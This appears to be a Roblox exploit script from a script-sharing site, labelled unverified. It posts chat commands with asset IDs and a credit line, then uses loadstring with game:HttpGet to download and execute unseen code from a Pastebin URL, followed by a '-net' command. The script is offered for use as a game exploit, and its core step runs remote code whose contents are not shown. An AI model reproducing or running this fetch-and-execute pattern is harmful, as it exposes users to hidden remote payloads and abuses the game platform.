--[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] local player = game.Players.LocalPlayer -- Get the TextChatService local TextChatService = game:GetService("TextChatService") -- Function to send a chat message local function sendChatMessage(message) -- Check if TextChatService is available if TextChatService then -- Send the message to the default chat channel local chatChannel = TextChatService.TextChannels.RBXGeneral if chatChannel then chatChannel:SendAsync(message) else warn("Default chat channel (RBXGeneral) not found!") end else warn("TextChatService is not available!") end end -- Example: Send a chat message sendChatMessage("-gh 6531967293 12103270510 3403874988 10775031176 9350274205") sendChatMessage("credits to whoever made it (i cant find the original)") loadstring(game:HttpGet("https://pastebin.com/raw/WEifMP4Q"))() wait(3) sendChatMessage("-net")